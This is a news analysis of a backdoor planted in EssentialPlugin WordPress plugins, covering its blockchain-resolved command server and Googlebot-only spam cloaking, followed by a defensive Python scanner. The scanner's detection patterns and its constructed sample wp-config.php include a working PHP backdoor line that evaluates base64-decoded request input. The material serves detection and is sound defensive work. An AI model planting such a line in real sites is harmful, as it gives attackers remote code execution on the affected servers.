Cyber: WordPress plugin suite hacked to push malware to thousands of sites - Analysis
More than 30 WordPress plugins in the EssentialPlugin package have been compromised with malicious code that gives an attacker unauthorized access to the websites running them. The threat actor planted the backdoor last year but only recently activated it, at which point the affected plugins began generating spam pages and redirects according to instructions received from a command-and-control (C2) server.

The compromise affects plugins with hundreds of thousands of active installations. It was spotted by Austin Ginder, founder of managed WordPress hosting provider Anchor Hosting, after he received a tip that one add-on contained code allowing third-party access. Ginder's further investigation showed that the backdoor had been present in every plugin in the EssentialPlugin package since August 2025, after the project was acquired by a new owner in a six-figure deal.

EssentialPlugin, established in 2015 as WP Online Support and rebranded in 2021, is a WordPress development firm offering sliders, galleries, marketing tools, WooCommerce extensions, SEO/analytics utilities, and themes.

According to Ginder, the backdoor sat dormant until it was recently activated, at which point it silently contacted external infrastructure to fetch a file named 'wp-comments-posts.php' that injects malware into 'wp-config.php'. The injected code resolves its C2 address through the Ethereum blockchain, an evasion technique that lets the attacker move the C2 location without depending on a domain that defenders could sinkhole, and it is effectively invisible to site owners because its output is served only to Googlebot. Depending on the instructions it receives, the malware serves spam links, redirects, or fake pages.

“The injected code was sophisticated. It fetched spam links, redirects, and fake pages from a command-and-control server. It only showed the spam to Googlebot, making it invisible to site owners,” explained Ginder.
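Two checks a site owner could run for the symptoms described above, written as an added example for this page (not code from the article, from Ginder, or from EssentialPlugin): a line-level scan of wp-config.php for constructs that do not belong in a stock configuration file, including any reference to 'wp-comments-posts.php' (a name that mimics the core wp-comments-post.php but is not a WordPress file), and a comparison of the external links a Googlebot-identifying request is served against those a normal browser sees. The indicator patterns, the sample wp-config.php, the sample HTML and the hosts example.com and spam.example.net are all constructed; the patterns are generic heuristics, not a signature of this particular backdoor.

```python
"""Two offline checks for the symptoms described in the article: code injected
into wp-config.php, and spam shown only to Googlebot (cloaking).
All sample data below is constructed for illustration; the indicator patterns
are generic heuristics, not a signature of the EssentialPlugin backdoor."""
import re
import urllib.request
from urllib.parse import urlparse

# Constructs that have no business in a stock wp-config.php. The file name
# 'wp-comments-posts.php' is the one the article reports; note that it is NOT
# the WordPress core file 'wp-comments-post.php' (singular).
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    re.compile(r"\bbase64_decode\s*\(", re.I),
    re.compile(r"\b(file_get_contents|curl_exec|fsockopen)\s*\(", re.I),
    re.compile(r"wp-comments-posts\.php", re.I),
]


def scan_wp_config(text):
    """Return [(line_no, line)] for every line matching an indicator pattern."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        if any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            hits.append((n, line.strip()))
    return hits


HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.I)


def external_links(html, site_host):
    """Set of absolute hrefs in `html` that point off the site's own host."""
    links = set()
    for href in HREF_RE.findall(html):
        host = urlparse(href).netloc.lower()
        if host and host != site_host.lower():
            links.add(href)
    return links


def cloaked_links(normal_html, bot_html, site_host):
    """External links a crawler is served that a normal visitor is not."""
    return external_links(bot_html, site_host) - external_links(normal_html, site_host)


GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0 Safari/537.36")


def fetch(url, user_agent, timeout=15):
    """Fetch `url` with the given User-Agent (live check; not used by the samples)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# ---- constructed samples (not real infected files) -------------------------
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp');
define('DB_PASSWORD', 'example');
@include_once(ABSPATH . 'wp-content/uploads/wp-comments-posts.php');
if (isset($_REQUEST['c'])) { eval(base64_decode($_REQUEST['c'])); }
$table_prefix = 'wp_';
require_once ABSPATH . 'wp-settings.php';
"""

SITE_HOST = "example.com"
NORMAL_HTML = """<html><body>
<a href="https://example.com/about">About</a>
<a href="https://wordpress.org/">Built with WordPress</a>
</body></html>"""
# The same page as served to a Googlebot User-Agent: a hidden block of spam links.
GOOGLEBOT_HTML = NORMAL_HTML.replace(
    "</body>",
    '<div style="display:none">'
    '<a href="https://spam.example.net/casino">casino</a>'
    '<a href="https://spam.example.net/pills">pills</a>'
    '</div></body>',
)

if __name__ == "__main__":
    for n, line in scan_wp_config(SAMPLE_WP_CONFIG):
        print(f"wp-config.php:{n}: {line}")
    for href in sorted(cloaked_links(NORMAL_HTML, GOOGLEBOT_HTML, SITE_HOST)):
        print("cloaked:", href)
    # Live variant against a site you own (uncomment to run):
    # url = "https://example.com/"
    # print(cloaked_links(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA), SITE_HOST))
```

The User-Agent comparison only catches cloaking that keys on the User-Agent header; if the injected code verifies the requester against Google's crawler IP ranges instead, fetch the page through Google Search Console's URL Inspection tool and diff the HTML it shows against a browser fetch. Treat any hit from the wp-config.php scan as a signal to compare the file against a known-good copy, since a legitimate configuration file contains constants, the table prefix and the final require of wp-settings.php and little else.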
Source: BleepingComputer